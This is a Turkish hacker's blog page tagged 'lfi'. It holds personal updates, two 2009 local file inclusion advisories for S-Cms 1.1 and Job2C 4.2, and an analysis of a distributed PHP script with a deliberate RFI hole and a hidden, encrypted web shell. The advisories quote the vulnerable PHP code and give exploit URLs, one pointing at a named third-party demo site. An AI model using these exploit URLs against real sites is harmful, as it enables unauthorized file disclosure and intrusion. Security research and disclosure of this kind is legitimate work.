"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

lfi etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
lfi etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

26 Temmuz 2011 Salı

özlemişim :))

ocak 17-temmuz 26 baya bi zaman geçmiş :)) pr aşağı düşmüş aşağılık kopmleksi yaşıyormuş :P doktor muhtemelen asker ;) life kardeşimle görüşemedim bile :(( bla aylardır bloğuna uğramamış ben gibi :(( vs vs vs ben neler yaptım küçük bi site tasarladım public yaparım çok eksiği var :) ama tema vs beni sardı. buffer overflow a baya bi yoğunlaştım ara ara kafayı mı yiyorum diye tereddütler yaşayınca aralar verdim :) verdiğim aralarda da siteyi tasarladım :) php baya bi ilerlettim yani uzmanlık seviyesinde değil ama benim işimi görüyor. bol bol lfi ile uğrastım :DD keza python yine baş tacı :)) 20 bilemedin 25 gün kadar da kpss hazırlandım çok bile :)) bu kadar başka değişiklik yok.

30 Nisan 2009 Perşembe

S-Cms 1.1 Stable (page) Local File Inclusion Vulnerability

kaynak: http://www.milw0rm.com/exploits/8566

kaynak: http://www.yildirimordulari.com/showthread.php?t=6244



file:

s-cms/plugin.php

code:

$page=$_GET['page']; ( error 1 )


$sql_select_plugin_case= mysql_query("SELECT * FROM ".$prefix."_plugins WHERE active = '1' AND file='$page'");

if ($sql_select_plugin_case){

include "plugins/$page"; (error 2 )

exp:

yildirimordulari.com/s-cms/plugin.php?page=[File]

for demo:

http://www.nonsolomazzini.altervista.org/s-cms/plugin.php?page=[LFi]

24 Nisan 2009 Cuma

işte bir zone scripti daha

şimdi scripti beraber inceleyelim. scriptte ilk basta hersey normalmiş gibi görüniyo fakat biraz tarattığımızda rfi ve sql açıkları ile birde shell mevcut :) shell direk gözükmüyor hatta işini bilen kişiler tarafından hazırlandığıda belli oluyo tebrik etmekte lazım şimdi bakalım:

rfi:






sekilde de gördüğünüz gibi sadece bir rfi var oda system/sayfa.php de include edile dizin verisidir. oysa dizin verisi tanımlansa bu açık ortadan kalkacak bilerek tanımlanmamış ;) yada hiç buna bile gerek kalmadan ../alt.php şeklinde include edilse yine böyle bir sorun olmuycak yani sırf açık mevcut olsun script kullanıldıktan birkac gün sonra çakalım :D

gelelim başka bir açığa ama bu benimde hoşuma gitti beğendim. önce shell i css/spread klasörünün içine yerleştirmişler tabi bunu şifrelemişler yani bakınca direk shell olduğunu görmeniz mümkün değil hani sistem dosyasıymış gibi algılamanızı sağlıycak. benim hoşuma giden teknik ise kendi hazırladıkları index.html dosyasında bu dosyayı göstermemeleri. yani siz girdiğinizde bütün dosyaları görceksiniz yani adamlar herseyi tasarlamıslar. alın size sosyal :D ama ciddi manada ben beğendim tekniği ;) neyse bi kaç görüntü verdim inceleyin umarım demek istediğimi anlamıssınızdır. scriptleri lütfen körü körüne alıp site açmayın inceleyin ;)







15 Nisan 2009 Çarşamba

Job2C 4.2 (adtype) Multiple Local File Inclusion Vulnerabilities

kaynak: http://www.milw0rm.com/exploits/8443

kaynak: http://www.yildirimordulari.com/showthread.php?t=5228



file:

windetail.php

err0r c0de:

$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"]; ( err0r c0de 1 )
$title=$_REQUEST["title"];

winHead($title);
include("lib/".$adtype.".inc"); ( err0r c0de 2 )

exp 1:

yildirimordulari.com/script/windetail.php?adtype=LFi

file:

detail.php

err0r c0de:

$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"]; ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";

include("lib/".$adtype.".inc"); ( err0r c0de 1 )


exp 2:

yildirimordulari.com/script/detail.php?adtype=LFi00

3 Mart 2009 Salı

str0ke ömrümü yedin xD

yav son günlerde gönderdiğim bütün buglara bir kulp takıyor namussuz :D yok nerden indircem yok versiyon a.q sen bul onlarında açık varmı var :D sözün kısası pek bi anlaşamıyoruz xD
 
Dizi